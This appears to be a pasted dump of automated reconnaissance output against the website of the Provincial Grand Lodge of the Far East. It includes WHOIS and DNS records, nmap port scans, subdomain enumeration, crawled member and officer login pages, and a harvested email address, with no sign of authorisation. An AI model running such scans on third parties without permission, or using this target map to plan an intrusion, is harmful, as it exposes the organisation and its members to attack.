· 6 years ago · Nov 25, 2019, 02:48 PM
1#######################################################################################################################################
2======================================================================================================================================
3Hostname www.pglfe.org ISP CenturyLink Communications, LLC
4Continent North America Flag
5US
6Country United States Country Code US
7Region Massachusetts Local time 25 Nov 2019 07:39 EST
8City Waltham Postal Code 02451
9IP Address 192.252.144.58 Latitude 42.397
10 Longitude -71.243
11=======================================================================================================================================
12#######################################################################################################################################
13> www.pglfe.org
14Server: 185.93.180.131
15Address: 185.93.180.131#53
16
17Non-authoritative answer:
18Name: www.pglfe.org
19Address: 192.252.144.58
20>
21#######################################################################################################################################
22Domain Name: PGLFE.ORG
23Registry Domain ID: D124888109-LROR
24Registrar WHOIS Server: whois.godaddy.com
25Registrar URL: http://www.whois.godaddy.com
26Updated Date: 2017-02-14T08:11:42Z
27Creation Date: 2006-06-22T00:09:56Z
28Registry Expiry Date: 2022-06-22T00:09:56Z
29Registrar Registration Expiration Date:
30Registrar: GoDaddy.com, LLC
31Registrar IANA ID: 146
32Registrar Abuse Contact Email: abuse@godaddy.com
33Registrar Abuse Contact Phone: +1.4806242505
34Reseller:
35Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
36Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
37Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
38Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
39Registrant Organization: The Provincial Grand Lodge of the Far East
40Registrant State/Province:
41Registrant Country: HK
42Name Server: NS1.SERVER279.COM
43Name Server: NS2.SERVER279.COM
44DNSSEC: unsigned
45#######################################################################################################################################
46[+] Target : www.pglfe.org
47
48[+] IP Address : 192.252.144.58
49
50[+] Headers :
51
52[+] Date : Mon, 25 Nov 2019 12:44:29 GMT
53[+] Server : Apache
54[+] Expires : Thu, 19 Nov 1981 08:52:00 GMT
55[+] Cache-Control : no-store, no-cache, must-revalidate, post-check=0, pre-check=0
56[+] Pragma : no-cache
57[+] Set-Cookie : pglfesesid=8a728b7630c4b963ff6ccadf5caa3f5c; path=/
58[+] Upgrade : h2
59[+] Connection : Upgrade, Keep-Alive
60[+] Keep-Alive : timeout=5, max=100
61[+] Transfer-Encoding : chunked
62[+] Content-Type : text/html
63
64[+] SSL Certificate Information :
65
66[+] commonName : catchall-server-default.server279.com
67[+] countryName : US
68[+] organizationName : Let's Encrypt
69[+] commonName : Let's Encrypt Authority X3
70[+] Version : 3
71[+] Serial Number : 03E1E2F2569563636C9E9DB9B2F3D0A012F8
72[+] Not Before : Sep 22 05:35:30 2019 GMT
73[+] Not After : Dec 21 05:35:30 2019 GMT
74[+] OCSP : ('http://ocsp.int-x3.letsencrypt.org',)
75[+] subject Alt Name : (('DNS', 'catchall-server-default.server279.com'),)
76[+] CA Issuers : ('http://cert.int-x3.letsencrypt.org/',)
77
78[+] Whois Lookup :
79
80[+] NIR : None
81[+] ASN Registry : arin
82[+] ASN : 3561
83[+] ASN CIDR : 192.252.144.0/20
84[+] ASN Country Code : US
85[+] ASN Date : 2013-06-27
86[+] ASN Description : CENTURYLINK-LEGACY-SAVVIS - CenturyLink Communications, LLC, US
87[+] cidr : 192.252.144.0/20
88[+] name : SURESUPPORT-LLC
89[+] handle : NET-192-252-144-0-1
90[+] range : 192.252.144.0 - 192.252.159.255
91[+] description : SureSupport LLC
92[+] country : US
93[+] state : MA
94[+] city : Waltham
95[+] address : SAVVIS
96600 Winter St.
97[+] postal_code : 02451
98[+] emails : ['abuse@suresupport.com', 'admin@suresupport.com']
99[+] created : 2013-06-27
100[+] updated : 2013-08-06
101
102[+] Crawling Target...
103
104[+] Looking for robots.txt........[ Not Found ]
105[+] Looking for sitemap.xml.......[ Not Found ]
106[+] Extracting CSS Links..........[ 11 ]
107[+] Extracting Javascript Links...[ 21 ]
108[+] Extracting Internal Links.....[ 1 ]
109[+] Extracting External Links.....[ 4 ]
110[+] Extracting Images.............[ 38 ]
111
112[+] Total Links Extracted : 75
113
114[+] Dumping Links in /opt/FinalRecon/dumps/www.pglfe.org.dump
115[+] Completed!
116#######################################################################################################################################
117[i] Scanning Site: http://www.pglfe.org
118
119
120
121B A S I C I N F O
122====================
123
124
125[+] Site Title: Provincial Grand Lodge of the Far East
126[+] IP address: 192.252.144.58
127[+] Web Server: Apache
128[+] CMS: Could Not Detect
129[+] Cloudflare: Not Detected
130[+] Robots File: Could NOT Find robots.txt!
131
132
133
134
135W H O I S L O O K U P
136========================
137
138 Domain Name: PGLFE.ORG
139Registry Domain ID: D124888109-LROR
140Registrar WHOIS Server: whois.godaddy.com
141Registrar URL: http://www.whois.godaddy.com
142Updated Date: 2017-02-14T08:11:42Z
143Creation Date: 2006-06-22T00:09:56Z
144Registry Expiry Date: 2022-06-22T00:09:56Z
145Registrar Registration Expiration Date:
146Registrar: GoDaddy.com, LLC
147Registrar IANA ID: 146
148Registrar Abuse Contact Email: abuse@godaddy.com
149Registrar Abuse Contact Phone: +1.4806242505
150Reseller:
151Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
152Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
153Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
154Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
155Registrant Organization: The Provincial Grand Lodge of the Far East
156Registrant State/Province:
157Registrant Country: HK
158Name Server: NS1.SERVER279.COM
159Name Server: NS2.SERVER279.COM
160DNSSEC: unsigned
161URL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)
162>>> Last update of WHOIS database: 2019-11-25T12:43:51Z <<<
163
164For more information on Whois status codes, please visit https://icann.org/epp
165
166
167
168
169
170G E O I P L O O K U P
171=========================
172
173[i] IP Address: 192.252.144.58
174[i] Country: United States
175[i] State: Massachusetts
176[i] City: Waltham
177[i] Latitude: 42.3986
178[i] Longitude: -71.2451
179
180
181
182
183H T T P H E A D E R S
184=======================
185
186
187
188
189
190
191D N S L O O K U P
192===================
193
194pglfe.org. 2559 IN SOA ns1.server279.com. hostmaster.pglfe.org. 1574672517 16384 2048 1048576 2560
195pglfe.org. 21599 IN NS ns1.server279.com.
196pglfe.org. 21599 IN NS ns2.server279.com.
197pglfe.org. 14399 IN MX 0 mail.pglfe.org.
198pglfe.org. 14399 IN TXT "v=spf1 a mx include:server279.smtp-spf.sureserver.com ~all"
199pglfe.org. 14399 IN A 192.252.144.58
200
201
202
203
204S U B N E T C A L C U L A T I O N
205====================================
206
207Address = 192.252.144.58
208Network = 192.252.144.58 / 32
209Netmask = 255.255.255.255
210Broadcast = not needed on Point-to-Point links
211Wildcard Mask = 0.0.0.0
212Hosts Bits = 0
213Max. Hosts = 1 (2^0 - 0)
214Host Range = { 192.252.144.58 - 192.252.144.58 }
215
216
217
218N M A P P O R T S C A N
219============================
220
221Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-25 12:45 UTC
222Nmap scan report for pglfe.org (192.252.144.58)
223Host is up (0.027s latency).
224
225PORT STATE SERVICE
22621/tcp open ftp
22722/tcp open ssh
22823/tcp filtered telnet
22980/tcp open http
230110/tcp open pop3
231143/tcp open imap
232443/tcp open https
2333389/tcp filtered ms-wbt-server
234
235Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds
236
237
238
239S U B - D O M A I N F I N D E R
240==================================
241
242
243[i] Total Subdomains Found : 3
244
245[+] Subdomain: mta-sts.mail.pglfe.org
246[-] IP: 192.252.144.58
247
248[+] Subdomain: hostmaster.pglfe.org
249[-] IP: 192.252.144.58
250
251[+] Subdomain: www.pglfe.org
252[-] IP: 192.252.144.58
253######################################################################################################################################
254[+] Starting At 2019-11-25 07:44:45.942326
255[+] Collecting Information On: http://www.pglfe.org/
256[#] Status: 200
257--------------------------------------------------
258[#] Web Server Detected: Apache
259[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
260- Date: Mon, 25 Nov 2019 12:44:46 GMT
261- Server: Apache
262- Expires: Thu, 19 Nov 1981 08:52:00 GMT
263- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
264- Pragma: no-cache
265- Set-Cookie: pglfesesid=7d78633488a6818af17a1a6e85e3fc93; path=/
266- Upgrade: h2
267- Connection: Upgrade, Keep-Alive
268- Keep-Alive: timeout=5, max=100
269- Transfer-Encoding: chunked
270- Content-Type: text/html
271--------------------------------------------------
272[#] Finding Location..!
273[#] status: success
274[#] country: United States
275[#] countryCode: US
276[#] region: MA
277[#] regionName: Massachusetts
278[#] city: Waltham
279[#] zip: 02451
280[#] lat: 42.3972
281[#] lon: -71.2677
282[#] timezone: America/New_York
283[#] isp: CenturyLink Communications, LLC
284[#] org: SureSupport LLC
285[#] as: AS3561 CenturyLink Communications, LLC
286[#] query: 192.252.144.58
287--------------------------------------------------
288[x] Didn't Detect WAF Presence on: http://www.pglfe.org/
289--------------------------------------------------
290[#] Starting Reverse DNS
291[-] Failed ! Fail
292--------------------------------------------------
293[!] Scanning Open Port
294[#] 21/tcp open ftp
295[#] 22/tcp open ssh
296[#] 80/tcp open http
297[#] 110/tcp open pop3
298[#] 143/tcp open imap
299[#] 443/tcp open https
300[#] 587/tcp open submission
301[#] 993/tcp open imaps
302[#] 995/tcp open pop3s
303[#] 3306/tcp open mysql
304--------------------------------------------------
305[+] Collecting Information Disclosure!
306[#] Detecting sitemap.xml file
307[-] sitemap.xml file not Found!?
308[#] Detecting robots.txt file
309[-] robots.txt file not Found!?
310[#] Detecting GNU Mailman
311[-] GNU Mailman App Not Detected!?
312--------------------------------------------------
313[+] Crawling Url Parameter On: http://www.pglfe.org/
314--------------------------------------------------
315[#] Searching Html Form !
316[-] No Html Form Found!?
317--------------------------------------------------
318[!] Found 3 dom parameter
319[#] http://www.pglfe.org//#
320[#] http://www.pglfe.org//#
321[#] http://www.pglfe.org//#
322--------------------------------------------------
323[!] 1 Internal Dynamic Parameter Discovered
324[+] http://www.pglfe.org///members/member_login.php?to_page=photos
325--------------------------------------------------
326[-] No external Dynamic Paramter Found!?
327--------------------------------------------------
328[!] 92 Internal links Discovered
329[+] http://www.pglfe.org//favicon.ico
330[+] http://www.pglfe.org//_include/css/jquery.cycle.css
331[+] http://www.pglfe.org//_include/css/prettyPhoto.css
332[+] http://www.pglfe.org//_include/css/jquery.roundabout.css
333[+] http://www.pglfe.org//_include/css/style.css
334[+] http://www.pglfe.org//_include/css/style-orange.css
335[+] http://www.pglfe.org//_include/css/style-dirtyblue.css
336[+] http://www.pglfe.org//_include/css/style-redish.css
337[+] http://www.pglfe.org//_include/css/style-green.css
338[+] http://www.pglfe.org//_include/css/style-pink.css
339[+] http://www.pglfe.org//_include/css/style-enhance.css
340[+] http://www.pglfe.org//_include/css/ie.css
341[+] http://www.pglfe.org//_include/css/ie6.css
342[+] http://www.pglfe.org//_include/css/featureCarousel.css
343[+] http://www.pglfe.org///index.php
344[+] http://www.pglfe.org///index.php
345[+] http://www.pglfe.org///pglfe_lodges.php
346[+] http://www.pglfe.org///erin463.php
347[+] http://www.pglfe.org///shamrock712.php
348[+] http://www.pglfe.org///emerald883.php
349[+] http://www.pglfe.org///sinolusitano897.php
350[+] http://www.pglfe.org///stdavid903.php
351[+] http://www.pglfe.org///badenpowell929.php
352[+] http://www.pglfe.org///installedmasters1001.php
353[+] http://www.pglfe.org///pglfe_chapter_km.php
354[+] http://www.pglfe.org///emeraldrac712.php
355[+] http://www.pglfe.org///bauhiniarac322.php
356[+] http://www.pglfe.org///badenpowellrac929.php
357[+] http://www.pglfe.org///hamiltonkm67.php
358[+] http://www.pglfe.org///pglfe_calendar2014.php
359[+] http://www.pglfe.org///pglfe_calendar2015.php
360[+] http://www.pglfe.org///pglfe_calendar2016.php
361[+] http://www.pglfe.org///pglfe_calendar2017.php
362[+] http://www.pglfe.org///pglfe_calendar2018.php
363[+] http://www.pglfe.org///pglfe_calendar2019.php
364[+] http://www.pglfe.org///contact.php
365[+] http://www.pglfe.org///contact_dgrac.php
366[+] http://www.pglfe.org///index.php
367[+] http://www.pglfe.org//pglfe_lodges.php
368[+] http://www.pglfe.org//pglfe_chapter_km.php
369[+] http://www.pglfe.org//gli_officers_hk.php
370[+] http://www.pglfe.org//pglfe-officers.php
371[+] http://www.pglfe.org//sgrac_officers_hk.php
372[+] http://www.pglfe.org//dgracfe_officers.php
373[+] http://www.pglfe.org//km_officers_hk.php
374[+] http://www.pglfe.org//km_council_hk.php
375[+] http://www.pglfe.org//erin463.php
376[+] http://www.pglfe.org//erin463.php
377[+] http://www.pglfe.org//shamrock712.php
378[+] http://www.pglfe.org//shamrock712.php
379[+] http://www.pglfe.org//emerald883.php
380[+] http://www.pglfe.org//emerald883.php
381[+] http://www.pglfe.org//sinolusitano897.php
382[+] http://www.pglfe.org//sinolusitano897.php
383[+] http://www.pglfe.org//stdavid903.php
384[+] http://www.pglfe.org//stdavid903.php
385[+] http://www.pglfe.org//badenpowell929.php
386[+] http://www.pglfe.org//badenpowell929.php
387[+] http://www.pglfe.org//installedmasters1001.php
388[+] http://www.pglfe.org//installedmasters1001.php
389[+] http://www.pglfe.org//emeraldrac712.php
390[+] http://www.pglfe.org//emeraldrac712.php
391[+] http://www.pglfe.org//bauhiniarac322.php
392[+] http://www.pglfe.org//bauhiniarac322.php
393[+] http://www.pglfe.org//badenpowellrac929.php
394[+] http://www.pglfe.org//badenpowellrac929.php
395[+] http://www.pglfe.org//hamiltonkm67.php
396[+] http://www.pglfe.org//sinolusitano897.php
397[+] http://www.pglfe.org//hamiltonkm67.php
398[+] http://www.pglfe.org///erin463.php
399[+] http://www.pglfe.org///shamrock712.php
400[+] http://www.pglfe.org///emerald883.php
401[+] http://www.pglfe.org///sinolusitano897.php
402[+] http://www.pglfe.org///stdavid903.php
403[+] http://www.pglfe.org///badenpowell929.php
404[+] http://www.pglfe.org///installedmasters1001.php
405[+] http://www.pglfe.org///emeraldrac712.php
406[+] http://www.pglfe.org///bauhiniarac322.php
407[+] http://www.pglfe.org///badenpowellrac929.php
408[+] http://www.pglfe.org///hamiltonkm67.php
409[+] http://www.pglfe.org///members/member_login.php
410[+] http://www.pglfe.org///pglfe_officers/officer_login.php
411[+] http://www.pglfe.org///pglfe_sec/secretary_login.php
412[+] http://www.pglfe.org///pglfe_doc/doc_login.php
413[+] http://www.pglfe.org///dgracfe_officers/officer_login.php
414[+] http://www.pglfe.org///dgracfe_reg/registrar_login.php
415[+] http://www.pglfe.org///dgracfe_doc/doc_login.php
416[+] http://www.pglfe.org
417[+] http://www.pglfe.org///index.php
418[+] http://www.pglfe.org///members/member_login.php
419[+] http://www.pglfe.org///pglfe_calendar2017.php
420[+] http://www.pglfe.org///contact.php
421--------------------------------------------------
422[!] 4 External links Discovered
423[#] http://zetlandhall.com
424[#] http://www.freemason.ie
425[#] http://freemason.ie/about-grand-lodge/appendant-bodies/supreme-grand-royal-arch-chapter-of-ireland/
426[#] http://www.knight-masons.com
427--------------------------------------------------
428[#] Mapping Subdomain..
429[!] Found 4 Subdomain
430- mail.pglfe.org
431- mta-sts.mail.pglfe.org
432- hostmaster.pglfe.org
433- www.pglfe.org
434--------------------------------------------------
435[!] Done At 2019-11-25 07:56:21.242286
436#######################################################################################################################################
437[INFO] ------TARGET info------
438[*] TARGET: http://www.pglfe.org/
439[*] TARGET IP: 192.252.144.58
440[INFO] NO load balancer detected for www.pglfe.org...
441[*] DNS servers: ns1.server279.com.
442[*] TARGET server:
443[*] CC: US
444[*] Country: United States
445[*] RegionCode: MA
446[*] RegionName: Massachusetts
447[*] City: Waltham
448[*] ASN: AS3561
449[*] BGP_PREFIX: 192.252.144.0/20
450[*] ISP: CENTURYLINK-LEGACY-SAVVIS - CenturyLink Communications, LLC, US
451[INFO] DNS enumeration:
452[*] ad.pglfe.org 192.252.144.58
453[*] admin.pglfe.org 192.252.144.58
454[*] ads.pglfe.org 192.252.144.58
455[*] alpha.pglfe.org 192.252.144.58
456[*] api.pglfe.org 192.252.144.58
457[*] api-online.pglfe.org 192.252.144.58
458[*] apolo.pglfe.org 192.252.144.58
459[*] app.pglfe.org 192.252.144.58
460[*] beta.pglfe.org 192.252.144.58
461[*] bi.pglfe.org 192.252.144.58
462[*] blog.pglfe.org 192.252.144.58
463[*] cdn.pglfe.org 192.252.144.58
464[*] events.pglfe.org 192.252.144.58
465[*] ex.pglfe.org 192.252.144.58
466[*] files.pglfe.org 192.252.144.58
467[*] ftp.pglfe.org 192.252.144.58
468[*] gateway.pglfe.org 192.252.144.58
469[*] go.pglfe.org 192.252.144.58
470[*] help.pglfe.org 192.252.144.58
471[*] ib.pglfe.org 192.252.144.58
472[*] images.pglfe.org 192.252.144.58
473[*] internetbanking.pglfe.org 192.252.144.58
474[*] intranet.pglfe.org 192.252.144.58
475[*] jobs.pglfe.org 192.252.144.58
476[*] join.pglfe.org 192.252.144.58
477[*] live.pglfe.org 192.252.144.58
478[*] login.pglfe.org 192.252.144.58
479[*] m.pglfe.org 192.252.144.58
480[*] mail.pglfe.org 192.252.144.58
481[*] mail2.pglfe.org 192.252.144.58
482[*] mobile.pglfe.org 192.252.144.58
483[*] moodle.pglfe.org 192.252.144.58
484[*] mx.pglfe.org 192.252.144.58
485[*] mx2.pglfe.org 192.252.144.58
486[*] mx3.pglfe.org 192.252.144.58
487[*] my.pglfe.org 192.252.144.58
488[*] new.pglfe.org 192.252.144.58
489[*] news.pglfe.org 192.252.144.58
490[*] ns1.pglfe.org 192.252.144.58
491[*] ns2.pglfe.org 192.252.144.58
492[*] ns3.pglfe.org 192.252.144.58
493[*] oauth.pglfe.org 192.252.144.58
494[*] old.pglfe.org 192.252.144.58
495[*] one.pglfe.org 192.252.144.58
496[*] open.pglfe.org 192.252.144.58
497[*] out.pglfe.org 192.252.144.58
498[*] outlook.pglfe.org 192.252.144.58
499[*] portfolio.pglfe.org 192.252.144.58
500[*] raw.pglfe.org 192.252.144.58
501[*] repo.pglfe.org 192.252.144.58
502[*] router.pglfe.org 192.252.144.58
503[*] search.pglfe.org 192.252.144.58
504[*] siem.pglfe.org 192.252.144.58
505[*] slack.pglfe.org 192.252.144.58
506[*] slackbot.pglfe.org 192.252.144.58
507[*] snmp.pglfe.org 192.252.144.58
508[*] stream.pglfe.org 192.252.144.58
509[*] support.pglfe.org 192.252.144.58
510[*] syslog.pglfe.org 192.252.144.58
511[*] tags.pglfe.org 192.252.144.58
512[*] test.pglfe.org 192.252.144.58
513[*] upload.pglfe.org 192.252.144.58
514[*] video.pglfe.org 192.252.144.58
515[*] vpn.pglfe.org 192.252.144.58
516[*] webconf.pglfe.org 192.252.144.58
517[*] webmail.pglfe.org 192.252.144.58
518[*] webportal.pglfe.org 192.252.144.58
519[*] wiki.pglfe.org 192.252.144.58
520[*] www2.pglfe.org 192.252.144.58
521[*] www3.pglfe.org 192.252.144.58
522[*] zendesk.pglfe.org 192.252.144.58
523[INFO] Possible abuse mails are:
524[*] abuse@pglfe.org
525[*] abuse@suresupport.com
526[*] abuse@www.pglfe.org
527[INFO] NO PAC (Proxy Auto Configuration) file FOUND
528[INFO] Starting FUZZing in http://www.pglfe.org/FUzZzZzZzZz...
529[INFO] Status code Folders
530[ALERT] Look in the source code. It may contain passwords
531
532Recherche www.pglfe.org
533Connexion HTTP à www.pglfe.org
534Alerte ! : Impossible d’établir une connexion à l’hôte distant.
535
536lynx : accès impossible au fichier de départ http://www.pglfe.org/
537[INFO] Links found from http://www.pglfe.org/ http://192.252.144.58/:
538cut: intervalle de champ incorrecte
539Saisissez « cut --help » pour plus d'informations.
540[INFO] Shodan detected the following opened ports on 192.252.144.58:
541[*] 0
542[*] 1
543[*] 110
544[*] 21
545[*] 214
546[*] 22
547[*] 3
548[*] 4
549[*] 443
550[*] 587
551[*] 8
552[*] 80
553[*] 993
554[*] 995
555[INFO] ------VirusTotal SECTION------
556[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
557[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
558[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
559[INFO] ------Alexa Rank SECTION------
560[INFO] Percent of Visitors Rank in Country:
561[INFO] Percent of Search Traffic:
562[INFO] Percent of Unique Visits:
563[INFO] Total Sites Linking In:
564[*] Total Sites
565[INFO] Useful links related to www.pglfe.org - 192.252.144.58:
566[*] https://www.virustotal.com/pt/ip-address/192.252.144.58/information/
567[*] https://www.hybrid-analysis.com/search?host=192.252.144.58
568[*] https://www.shodan.io/host/192.252.144.58
569[*] https://www.senderbase.org/lookup/?search_string=192.252.144.58
570[*] https://www.alienvault.com/open-threat-exchange/ip/192.252.144.58
571[*] http://pastebin.com/search?q=192.252.144.58
572[*] http://urlquery.net/search.php?q=192.252.144.58
573[*] http://www.alexa.com/siteinfo/www.pglfe.org
574[*] http://www.google.com/safebrowsing/diagnostic?site=www.pglfe.org
575[*] https://censys.io/ipv4/192.252.144.58
576[*] https://www.abuseipdb.com/check/192.252.144.58
577[*] https://urlscan.io/search/#192.252.144.58
578[*] https://github.com/search?q=192.252.144.58&type=Code
579[INFO] Useful links related to AS3561 - 192.252.144.0/20:
580[*] http://www.google.com/safebrowsing/diagnostic?site=AS:3561
581[*] https://www.senderbase.org/lookup/?search_string=192.252.144.0/20
582[*] http://bgp.he.net/AS3561
583[*] https://stat.ripe.net/AS3561
584[INFO] Date: 25/11/19 | Time: 07:51:49
585[INFO] Total time: 7 minute(s) and 0 second(s)
586#######################################################################################################################################
587Trying "pglfe.org"
588;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 41004
589;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 2, ADDITIONAL: 2
590
591;; QUESTION SECTION:
592;pglfe.org. IN ANY
593
594;; ANSWER SECTION:
595pglfe.org. 0 IN A 192.252.144.58
596pglfe.org. 0 IN TXT "v=spf1 a mx include:server279.smtp-spf.sureserver.com ~all"
597pglfe.org. 0 IN MX 0 mail.pglfe.org.
598pglfe.org. 0 IN SOA ns1.server279.com. hostmaster.pglfe.org. 1574672517 16384 2048 1048576 2560
599pglfe.org. 0 IN NS ns2.server279.com.
600pglfe.org. 0 IN NS ns1.server279.com.
601
602;; AUTHORITY SECTION:
603pglfe.org. 25920 IN NS ns2.server279.com.
604pglfe.org. 25920 IN NS ns1.server279.com.
605
606;; ADDITIONAL SECTION:
607ns1.server279.com. 8294 IN A 192.252.144.29
608ns2.server279.com. 8294 IN A 192.252.145.29
609
610Received 291 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 86 ms
611#######################################################################################################################################
612; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace pglfe.org any
613;; global options: +cmd
614. 84082 IN NS b.root-servers.net.
615. 84082 IN NS c.root-servers.net.
616. 84082 IN NS k.root-servers.net.
617. 84082 IN NS d.root-servers.net.
618. 84082 IN NS h.root-servers.net.
619. 84082 IN NS e.root-servers.net.
620. 84082 IN NS f.root-servers.net.
621. 84082 IN NS g.root-servers.net.
622. 84082 IN NS m.root-servers.net.
623. 84082 IN NS a.root-servers.net.
624. 84082 IN NS i.root-servers.net.
625. 84082 IN NS l.root-servers.net.
626. 84082 IN NS j.root-servers.net.
627. 84082 IN RRSIG NS 8 0 518400 20191208050000 20191125040000 22545 . DES5nuyj3DGIteRe7CA3Qb+VnUrNG4ii2jkh6JbXQheBjpUcCVsDZcLx qpZP8Yuzx5DSQeNGy+pCZkJ9NWS1VUq1vRw7a4j/3/eQceItEbbuz0ub OU/LATveyZiCNif6zSpNk1J/+PjVjTXpmQtNSrUC1hzRPuqwaM1mq+jO TBHUCQ+d9lVbDvxiBY0BpqenDAvr+g6eocUpE+zkVd6Hi63uFa8EtqN4 GDZiHUKWfa4sNJfJ+K93smt0jmL2koK+fbGfe5LrFSEqRAqD622cYIwC lYrVAXCQk6GMoB2M6XhsEq8Rs7JF67wF34JgJIGpil1RiZBPHarEOHyD 1donaQ==
628;; Received 525 bytes from 185.93.180.131#53(185.93.180.131) in 170 ms
629
630org. 172800 IN NS b2.org.afilias-nst.org.
631org. 172800 IN NS c0.org.afilias-nst.info.
632org. 172800 IN NS d0.org.afilias-nst.org.
633org. 172800 IN NS b0.org.afilias-nst.org.
634org. 172800 IN NS a2.org.afilias-nst.info.
635org. 172800 IN NS a0.org.afilias-nst.info.
636org. 86400 IN DS 9795 7 1 364DFAB3DAF254CAB477B5675B10766DDAA24982
637org. 86400 IN DS 9795 7 2 3922B31B6F3A4EA92B19EB7B52120F031FD8E05FF0B03BAFCF9F891B FE7FF8E5
638org. 86400 IN RRSIG DS 8 1 86400 20191208050000 20191125040000 22545 . Z0yYUCBQBkybjLHdNRZEhZsJDifDl6vygC36jAIIddl3TBtmzcFXdrsZ 1QxRTWmIASGApPNdiChu9caXYXIj+cdx5lrJDO6s7qMxCRkHop3qEFGH Ek+gGfQrUE6iu2TaLb4uFtHMrzKhDEdsA14BxWWS1+/qDTvSkldaiMBP 306T8tkddCUVkwvZwfA/qa1JR3C4LAImRM9cvsL5g9CDSJMgV+70qMXZ ydSyg8IsIkKwY/i6lyXu4ngEAKuHrikkVkqM1Ph/499KkPv/CgxQn4Qp 4pMX9/1LucdTwEXH2UXstajX1Q0WSSKWqKc9HQ+7x6X7fc0Dim4Yq9rz MeMSqQ==
639;; Received 839 bytes from 2001:500:200::b#53(b.root-servers.net) in 77 ms
640
641pglfe.org. 86400 IN NS ns2.server279.com.
642pglfe.org. 86400 IN NS ns1.server279.com.
643h9p7u7tr2u91d0v0ljs9l1gidnp90u3h.org. 86400 IN NSEC3 1 1 1 D399EAAB H9PARR669T6U8O1GSG9E1LMITK4DEM0T NS SOA RRSIG DNSKEY NSEC3PARAM
644h9p7u7tr2u91d0v0ljs9l1gidnp90u3h.org. 86400 IN RRSIG NSEC3 7 2 86400 20191216130008 20191125120008 11324 org. vjTep5UP/yQKKM8o6loeJiLyLWDxldksQYuocq4uLUFTFKBXn8nbJGjj lBVfiNmzUPjrdOejfn3inxEct7t4LLzgxDXD0kucSXwajqNL7htHoLcj wFogv+eHfvQWr44R/IfTPGvJ9vPi1m8kfl2kegrAthbD92SQf9QMQ7oB G9k=
645se8cck8smv9kqeji13sdsv296fti8ur4.org. 86400 IN NSEC3 1 1 1 D399EAAB SE8RRNVH6QLQC7NJ760CUJVMJE90K9H9 A RRSIG
646se8cck8smv9kqeji13sdsv296fti8ur4.org. 86400 IN RRSIG NSEC3 7 2 86400 20191210152956 20191119142956 11324 org. eHEYe16cPij29zpQs5LKWJP8+uCHHwleAIF6ueUkUzta85xHCMBMmy81 HdCj/onglwsrgYSiMJGRXxifoJUWYEohm5lEtd+D8wuka3bP+b+ebFzf SVEHRAo+5qfHHdPDMRiTjJhBHEUGbbBMCG6pk5nrJOYtZh/azwT29aqE 578=
647;; Received 580 bytes from 199.19.56.1#53(a0.org.afilias-nst.info) in 274 ms
648
649;; Connection to 192.252.145.29#53(192.252.145.29) for pglfe.org failed: timed out.
650;; Connection to 192.252.145.29#53(192.252.145.29) for pglfe.org failed: timed out.
651;; connection timed out; no servers could be reached
652;; Connection to 192.252.145.29#53(192.252.145.29) for pglfe.org failed: timed out.
653#######################################################################################################################################
654[*] Performing General Enumeration of Domain: pglfe.org
655[!] Wildcard resolution is enabled on this domain
656[!] It is resolving to 192.252.144.58
657[!] All queries will resolve to this address!!
658[-] DNSSEC is not configured for pglfe.org
659[*] SOA ns1.server279.com 192.252.144.29
660[*] NS ns2.server279.com 192.252.145.29
661[*] NS ns1.server279.com 192.252.144.29
662[*] MX mail.pglfe.org 192.252.144.58
663[*] A pglfe.org 192.252.144.58
664[*] TXT pglfe.org v=spf1 a mx include:server279.smtp-spf.sureserver.com ~all
665[*] Enumerating SRV Records
666[-] No SRV Records Found for pglfe.org
667[+] 0 Records Found
668#######################################################################################################################################
669[*] Processing domain pglfe.org
670[*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
671[+] Getting nameservers
672192.252.145.29 - ns2.server279.com
673192.252.144.29 - ns1.server279.com
674[-] Zone transfer failed
675
676[+] TXT records found
677"v=spf1 a mx include:server279.smtp-spf.sureserver.com ~all"
678
679[+] MX records found, added to target list
6800 mail.pglfe.org.
681
682[+] Wildcard domain found - 192.252.144.58
683[*] Scanning pglfe.org for A records
684#######################################################################################################################################
685Domains still to check: 1
686 Checking if the hostname pglfe.org. given is in fact a domain...
687
688Analyzing domain: pglfe.org.
689 Checking NameServers using system default resolver...
690 IP: 192.252.145.29 (United States)
691 HostName: ns2.server279.com Type: NS
692 HostName: ns2.server279.com Type: PTR
693 IP: 192.252.144.29 (United States)
694 HostName: ns1.server279.com Type: NS
695 HostName: server279.com Type: PTR
696
697 Checking MailServers using system default resolver...
698 IP: 192.252.144.58 (United States)
699 HostName: mail.pglfe.org Type: MX
700 WARNING!! This domain has wildcards activated for hostnames resolution. We are checking "www" anyway, but perhaps it doesn't exists!
701
702 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
703 No zone transfer found on nameserver 192.252.144.29
704 No zone transfer found on nameserver 192.252.145.29
705
706 Checking SPF record...
707
708 Checking SPF record...
709
710 Checking SPF record...
711 No SPF record
712
713 Checking 1 most common hostnames using system default resolver...
714 IP: 192.252.144.58 (United States)
715 HostName: mail.pglfe.org Type: MX
716 HostName: www.pglfe.org. Type: A
717
718 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
719 Checking netblock 192.252.144.0
720 Checking netblock 192.252.145.0
721
722 Searching for pglfe.org. emails in Google
723 pglsec@pglfe.org)
724
